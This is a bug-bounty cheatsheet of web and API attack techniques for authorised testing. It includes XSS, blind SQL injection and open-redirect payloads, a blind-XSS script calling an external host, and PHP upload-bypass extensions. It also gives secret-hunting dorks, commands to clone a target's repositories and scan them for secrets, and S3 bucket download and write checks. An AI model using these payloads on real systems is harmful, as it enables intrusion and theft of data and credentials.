Web / APIs

This checklist is designed as a practical cheatsheet for bug bounty hunters.
It provides a structured way to critically review common attack surfaces, identify weak points,
and validate security controls in web applications.
The goal is efficiency: focus on what matters, minimize noise, and cover the techniques that consistently reveal real issues.

  • Analyse the app by inserting XSS payloads into every input that is reflected or stored
  • ATO via CSRF attack (changing email)
  • ATO via OAuth third-party app integrations
  • CSRF in sensitive functions
  • Critical IDORs
  • Upload features for malicious files
  • Horizontal privilege escalation in company settings
  • Vertical privilege escalation in company settings
  • Account deletion endpoints
  • 2FA bypass (direct, rate limit, response manipulation, etc)
  • No rate limiting in authentication/sensitive endpoints
  • Rate limiting bypasses (after getting 429 response)
  • Check origin IP address (DNS history records)
  • Race condition in functions that allow limited use only
  • Account data deletion
  • HTML injection in custom email functions
  • Dangerous HTTP methods enabled (e.g. X-HTTP-Method-Override: PUT)
  • Signup feature
  • Burp plugin “ParamMiner” to guess parameters/headers
  • Check JWT tokens authentication/authorization
  • Check account creation steps
  • Test weak password policy (low issue + bruteforce = takeover)
  • CAPTCHAs bypass
  • Subdomain takeover with impact
  • S3 bucket takeovers
  • Blind XSS in: contact us, ticket support, feedback, chat app
  • “Ticket Trick” vulnerability
  • Fuzzing for misconfiguration and sensitive files
  • CORS in sensitive endpoints
  • Test XXE if the server accepts SVG files
  • Use waybackurls to collect historical URLs of the target

Host Header Poisoning (headers to test):

X-Host: attacker.com
X-Server: attacker.com
X-Forwarded-For: attacker.com
X-Forwarded-Host: attacker.com

Additional checks:

  • Parameter Pollution — /email=danielv@gmail.com&email=attacker@gmail.com
  • Test “remember-me” function
  • Session fixation
  • Cookie bomb (e.g., endpoint/?dummy_cookie=reflect_this)
  • Password-reset token not expiring
  • Long Password/Email DoS attack

CSRF checks:

  • Remove CSRF token from request
  • Remove CSRF token parameter value
  • Change POST to GET and remove token:
    endpoint/?csrftoken=&dummy=danielvcookies
  • Use CSRF token from another account
  • Change Content-Type: application/json to
    Content-Type: text/plain or
    Content-Type: application/x-www-form-urlencoded
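As an added example (not part of the original checklist), a server-side CSRF check that closes each bypass listed above: token removed, token present but empty, POST switched to GET, a token borrowed from another account, and a swapped Content-Type. The Request shape, header and field names are assumptions.

```python
# Added example: CSRF validation hardened against the bypasses in the checklist.
# The Request class, header names and field names are assumptions for illustration.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Tuple

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
ALLOWED_CONTENT_TYPES = {"application/json"}  # what this JSON API expects

@dataclass
class Request:
    method: str
    headers: dict = field(default_factory=dict)
    query: dict = field(default_factory=dict)
    body: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)

def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to this session; tokens are never shared across accounts."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def check_csrf(req: Request) -> Tuple[bool, str]:
    """Return (accepted, reason) for a request to a state-changing endpoint."""
    # Bypass "change POST to GET": the transport method must itself be state-changing;
    # neither a query-string token nor X-HTTP-Method-Override can promote a GET.
    if req.method.upper() not in STATE_CHANGING:
        return False, "state change attempted via GET"
    # Bypass "swap Content-Type": text/plain and form encodings make the request
    # 'simple' for the browser, so enforce the expected type (ignore parameters).
    ctype = req.headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype not in ALLOWED_CONTENT_TYPES:
        return False, "unexpected Content-Type"
    # Bypass "remove token" / "remove token value": header or body, never the query string.
    supplied = req.headers.get("X-CSRF-Token") or req.body.get("csrftoken")
    if not supplied:
        return False, "missing or empty CSRF token"
    # Bypass "token from another account": compare against THIS session's token only,
    # in constant time (encode to bytes so non-ASCII input cannot raise).
    expected = req.session.get("csrf_token")
    if not expected or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "token does not match session"
    return True, "ok"
```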

File upload checks:

  • Upload unexpected file formats to achieve RCE (swf, html, php, php3, aspx)
  • Use Burp Suite “Upload Scanner” for varied file-upload checks
  • Blind SQL in filename:
    pocfilename'+(select*from(select(sleep(20)))a)+'.jpeg
  • Upload filename.jpg — if the name reflects, try XSS
  • Always try XXE in .docx, .pdf and .xml uploads

Always check whether uploads with these extensions are accepted and how the response serves them:

  • .svg
  • .html
  • .swf
  • .xml

PHP extensions:

.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm

Double extensions:

.jpeg.php
.jpg.php
.png.php

SQL injection (common injection points):

  • SQL in User-Agent header
  • Parameter id
  • Currency values
  • Item number values
  • Sorting parameters (asc, desc)
  • Cookie values
  • Custom headers (possible WAF/CDN integrations)

Blind XSS payload:

"><script src=https://blinddanielv.xss.ht></script>

Places to inject:

  • User-Agent
  • Place payload in order form (address line)
  • Contact us page
  • Feedback page
  • Chat app
  • Requests (delete account, unlock beta feature)
  • Signup page (free trial)

Open redirect (common places):

  • Signup / Sign in / Login
  • Password-reset forms
  • Manual test:
    https://host.com/login?redirect=https://attacker.com

Open redir + XSS:
redirectUrl=https://www.google.com/";alert(0);//

IDOR (common functions):

  • Non-public images
  • Receipts
  • Private files (PDF, etc.)
  • Shipping info & purchase orders
  • Messaging (send/delete)

Common params:

id=
user=
account=
number=
order=
no=
doc=
key=
email=
group=
profile=
edit=

Tip: check SQL injection in IDORs.

Clone all the COMPANY or USER repositories (clone_url gives https:// URLs; git_url returns git:// URLs, which GitHub no longer serves; for an organisation use /orgs/NAME/repos):

curl -s "https://api.github.com/users/COMPANYorUSER/repos?per_page=100" \
| jq -r ".[].clone_url" | xargs -L1 git clone

Then use GitLeaks (older syntax; gitleaks v8 uses: gitleaks detect -s all-company-and-user-gits -r gitleak-results.json -v):

gitleaks -p all-company-and-user-gits -o gitleak-results -v

Some useful dorks:

"target" password
"target" access_token
"target" client_secret
"target" account_sid
"target" private_token
"target" secret
"target" credentials
"target" token
"target" config
"target" key
"target" pass
"target" login
"target" ftp
"target" pwd
"company.com" "dev"
"company.com" API_key
"company.com" password
"target" db_host
"target" db_name
"target" db_user
"target" db_password

List the contents of an open bucket:

aws s3 ls s3://bucket-name

Download entire bucket:

aws s3 sync s3://bucket-name .

Upload a test file (write-permission check):

aws s3 cp malicious.txt s3://bucket-name/malicious.txt

Remove the test file afterwards:

aws s3 rm s3://bucket-name/malicious.txt